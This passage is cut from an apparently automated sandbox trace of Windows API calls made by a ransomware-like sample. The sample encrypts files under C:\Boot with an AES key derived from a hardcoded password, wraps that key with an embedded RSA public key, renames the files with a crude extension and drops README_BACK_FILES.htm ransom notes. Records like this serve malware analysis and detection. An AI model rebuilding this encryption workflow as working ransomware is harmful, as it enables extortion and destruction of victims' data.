"c:\\boot\\el-gr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.523] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.523] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27dfaf0) returned 1 [0126.525] CryptCreateHash (in: hProv=0x27dfaf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.525] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.525] CryptHashData (hHash=0x69d6e8, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.525] CryptDeriveKey (in: hProv=0x27dfaf0, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d328) returned 1 [0126.525] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.525] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.525] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfe20) returned 1 [0126.525] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfe20, dwCertEncodingType=0x1, pInfo=0x27db2e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db318*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db320*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e1e8) returned 1 [0126.525] CryptEncrypt (in: hKey=0x69e1e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.525] CryptEncrypt (in: hKey=0x69e1e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df628*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df628*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.525] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df628*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df628*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.526] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e67a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e67a0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.526] CryptEncrypt (in: hKey=0x69d328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e67a0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e67a0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.526] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e67a0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e67a0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.526] CloseHandle (hObject=0xffffffff) returned 1 [0126.526] CloseHandle (hObject=0x5cd8) returned 1 [0126.527] CopyFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.530] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.530] DeleteFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.gsg")) returned 1 [0126.532] MoveFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui.fuck")) returned 0 [0126.532] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.532] CryptDestroyKey (hKey=0x69d328) returned 1 [0126.532] CryptReleaseContext (hProv=0x27dfaf0, dwFlags=0x0) returned 1 [0126.532] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.532] FindClose (in: hFindFile=0x69d428 | out: hFindFile=0x69d428) returned 1 [0126.533] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\el-gr\\readme_back_files.htm")) returned 0xffffffff [0126.533] AreFileApisANSI () returned 1 [0126.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.533] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\el-gr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.534] GetFileType (hFile=0x5cec) returned 0x1 [0126.534] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.535] CloseHandle (hObject=0x5cec) returned 1 [0126.535] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.535] FindFirstFileA (in: lpFileName="C:\\\\Boot\\en-GB\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.536] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.536] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.536] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.536] GetLastError () returned 0x0 [0126.536] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0126.536] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.536] CreateFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.537] CreateFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.537] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.537] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27e00c8) returned 1 [0126.539] CryptCreateHash (in: hProv=0x27e00c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.539] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.539] CryptHashData (hHash=0x69d368, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.539] CryptDeriveKey (in: hProv=0x27e00c8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.539] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.539] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.539] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfd98) returned 1 [0126.539] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfd98, dwCertEncodingType=0x1, pInfo=0x27db628*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db658*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db660*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e068) returned 1 [0126.539] CryptEncrypt (in: hKey=0x69e068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.539] CryptEncrypt (in: hKey=0x69e068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e0150*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27e0150*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.540] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e0150*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e0150*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.540] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e6e50, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e6e50, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.540] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e6e50*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e6e50*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.540] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e6e50*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e6e50*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.540] CloseHandle (hObject=0xffffffff) returned 1 [0126.540] CloseHandle (hObject=0x5cd8) returned 1 [0126.541] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.544] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.544] DeleteFileA (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.gsg")) returned 1 [0126.545] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.fuck")) returned 0 [0126.545] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.545] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.545] CryptReleaseContext (hProv=0x27e00c8, dwFlags=0x0) returned 1 [0126.546] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.546] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.546] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-GB\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-gb\\readme_back_files.htm")) returned 0xffffffff [0126.546] AreFileApisANSI () returned 1 [0126.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.546] CreateFileW (lpFileName="C:\\\\Boot\\en-GB\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.547] GetFileType (hFile=0x5cec) returned 0x1 [0126.547] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.549] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.549] FindFirstFileA (in: lpFileName="C:\\\\Boot\\en-US\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.549] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.549] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.549] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.549] GetLastError () returned 0x0 [0126.549] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0126.549] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.549] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.549] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.550] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.550] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27dfaf0) returned 1 [0126.552] CryptCreateHash (in: hProv=0x27dfaf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.552] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.552] CryptHashData (hHash=0x69d368, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.552] CryptDeriveKey (in: hProv=0x27dfaf0, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.552] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.552] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.552] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfea8) returned 1 [0126.552] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfea8, dwCertEncodingType=0x1, pInfo=0x27da108*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da138*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da140*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dce8) returned 1 [0126.552] CryptEncrypt (in: hKey=0x69dce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.552] CryptEncrypt (in: hKey=0x69dce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27dff30*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27dff30*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.552] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27dff30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27dff30*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.553] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e7500, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e7500, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.553] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e7500*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e7500*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.553] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e7500*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e7500*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.553] CloseHandle (hObject=0xffffffff) returned 1 [0126.553] CloseHandle (hObject=0x5cd8) returned 1 [0126.646] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.659] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.659] DeleteFileA (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.gsg")) returned 1 [0126.661] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.fuck")) returned 0 [0126.661] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.661] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.661] CryptReleaseContext (hProv=0x27dfaf0, dwFlags=0x0) returned 1 [0126.662] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.662] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.662] GetLastError () returned 0x5 [0126.662] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0126.663] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.663] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.664] CreateFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.664] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.665] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27dfaf0) returned 1 [0126.667] CryptCreateHash (in: hProv=0x27dfaf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.667] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.667] CryptHashData (hHash=0x69d368, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.667] CryptDeriveKey (in: hProv=0x27dfaf0, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.668] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.668] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.668] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dffb8) returned 1 [0126.669] CryptImportPublicKeyInfo (in: hCryptProv=0x27dffb8, dwCertEncodingType=0x1, pInfo=0x27dac68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dac98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27daca0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dfe8) returned 1 [0126.669] CryptEncrypt (in: hKey=0x69dfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.669] CryptEncrypt (in: hKey=0x69dfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e0040*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27e0040*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.669] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e0040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e0040*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.670] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e8bb8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e8bb8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.670] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8bb8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e8bb8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.670] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e8bb8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: 